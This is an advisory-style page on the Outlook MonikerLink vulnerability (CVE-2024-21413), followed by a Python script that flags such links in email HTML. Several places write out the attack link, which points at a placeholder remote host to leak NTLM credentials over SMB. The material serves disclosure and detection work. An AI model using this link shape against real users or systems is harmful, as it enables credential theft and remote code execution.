CVE-2024-21413 | Outlook | RCE
| Vulnerability | CVE-2024-21413 |
|---|---|
| Type | Remote code execution (RCE) |
| Description | A critical vulnerability in Microsoft Outlook (CVSS 9.8), patched by Microsoft in the February 2024 security update and named the "MonikerLink bug" by Check Point Research, who reported it. Its consequences are twofold: leakage of the local user's NTLM credentials (the NTLM authentication hash sent when the remote file is fetched) and a path to remote code execution. Successful exploitation also bypasses Office Protected View: the attacker's document opens in editing mode rather than protected mode, which extends the threat from Outlook to the other Office applications that end up handling the file. The root cause is not Outlook-specific. The MonikerLink bug (or, more accurately, attack vector) arises from passing attacker-controlled strings to the unsafe COM APIs MkParseDisplayName/MkParseDisplayNameEx. Any other software that hands untrusted input to these APIs may therefore be affected in the same way. The comparison is to log4j: that bug affected the Java ecosystem through one widely used library, while this attack vector affects the Windows/COM ecosystem through one widely used API. |
| The Impact of the Bug | - From a hyperlink to a COM lookup: Outlook normally treats a plain file:// hyperlink as unsafe and warns the user, but a link of the form file:///\\10.10.111.111\test\test.rtf!something (note the "!" after the file name) evades that check. Outlook treats the string as a "Moniker Link": a display name that the caller uses to look up a COM object. Outlook passes it to ole32!MkParseDisplayName(), which parses it into a composite moniker: a File Moniker for \\10.10.111.111\test\test.rtf and an Item Moniker for the text after the "!". - Leaking the local NTLM credentials: binding the File Moniker makes Windows fetch the remote test.rtf over SMB (TCP port 445), and the SMB authentication to the attacker-controlled server leaks the local user's NTLM credential information in the process. - From the attack vector to arbitrary code execution: resolving the moniker also launches the file's COM server, Word, which opens and parses test.rtf. Because the file sits on the attacker-controlled server, its content is entirely under the attacker's control and is opened outside Protected View, which is what turns the lookup into a remote code execution opportunity. |
| How to detect if you have a vulnerable application to this attack vector? | Place a hyperlink of the form file:///\\IP\test\test.rtf!something (the "!" after the file name is what makes the string a composite moniker rather than a plain file link) somewhere in input that the target software will process, where "target software" means any program that may pass user-controlled strings to the MkParseDisplayName/MkParseDisplayNameEx APIs. Point IP at a host you control and monitor the target's behaviour while it processes the input: an outbound SMB connection to TCP port 445 on that host, an NTLM authentication attempt against it, or a Word (or other COM server) process spawning to open the remote file all indicate that the string reached the vulnerable code path. A program that only renders the link as text, or refuses to follow it, is not exercising the moniker lookup on that input. |
| References | https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413 https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/ https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability |
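As an added example (not part of the original page, nor code from Check Point Research or Microsoft), the following Python script scans an HTML e-mail body for hyperlinks of the MonikerLink shape described in the table: a file: link whose display name points at a remote UNC host and carries a "!item" suffix, which is exactly the string MkParseDisplayName would split into a File Moniker and an Item Moniker. It goes slightly beyond the single link in the text by classifying every file: link it finds (local drive, plain UNC, or UNC with an item suffix) so that plain remote file links, which also leak NTLM if followed, are reported too. The sample message body is constructed for the example; the 10.10.111.111 address is the page's own placeholder.

```python
"""Flag MonikerLink-style hyperlinks (CVE-2024-21413 pattern) in HTML mail.

Added example: collects href/src values from an HTML body, classifies every
file: link, and reports the remote (UNC) ones. A remote file: link whose
display name also carries a "!item" suffix is the shape Outlook handed to
ole32!MkParseDisplayName, which splits it into a File Moniker (the UNC path)
and an Item Moniker (the text after "!").
"""
import re
from html.parser import HTMLParser


class _HrefCollector(HTMLParser):
    """Collect href/src attribute values from every tag in the body."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.links.append(value.strip())


# file: + any run of slashes/backslashes + host (or drive letter)
#       [+ separator + path] [+ "!" + item]
_FILE_LINK_RE = re.compile(
    r"^file:[\\/]*(?P<host>[^\\/!]+)(?:[\\/]+(?P<path>[^!]*))?(?:!(?P<item>.*))?$",
    re.IGNORECASE,
)


def analyze_link(href):
    """Describe a file: hyperlink; return None for any other scheme."""
    m = _FILE_LINK_RE.match(href)
    if m is None:
        return None
    host = m.group("host")
    # "C:"-style hosts and localhost are local; anything else is a UNC host.
    is_local = bool(re.fullmatch(r"[A-Za-z]:", host)) or host.lower() == "localhost"
    item = m.group("item")
    return {
        "href": href,
        "host": host,
        "path": m.group("path") or "",   # File Moniker part (after the host)
        "item": item,                    # Item Moniker part, None if no "!"
        "remote": not is_local,
        # Remote file plus an item suffix is the CVE-2024-21413 MonikerLink shape.
        "moniker_link": (not is_local) and item is not None,
    }


def scan_html(html):
    """Return a description of every remote file: link found in the HTML."""
    collector = _HrefCollector()
    collector.feed(html)
    return [info for info in map(analyze_link, collector.links)
            if info is not None and info["remote"]]


# Constructed sample message body for the example (not a real phishing mail).
SAMPLE_MAIL_HTML = r"""<html><body>
<p>Quarterly report: <a href="https://example.com/report">open</a></p>
<p><a href="file:///\\10.10.111.111\test\test.rtf!something">click here</a></p>
<p><a href="file://10.10.111.111/share/notes.txt">plain UNC link</a></p>
<p><a href="file:///C:/Users/Public/local.docx">local file</a></p>
</body></html>"""


if __name__ == "__main__":
    for hit in scan_html(SAMPLE_MAIL_HTML):
        tag = "MONIKER-LINK" if hit["moniker_link"] else "remote-file"
        print(f"{tag}: host={hit['host']} path={hit['path']} item={hit['item']}")
```

Run against the sample body, the script reports two hits: the first link is flagged as a MonikerLink (host 10.10.111.111, item "something"), the second as a plain remote file link, while the https and local C: links are ignored. The same scan_html() call can be fed the HTML part of .eml files pulled from a mail gateway or quarantine to find messages that tried this pattern.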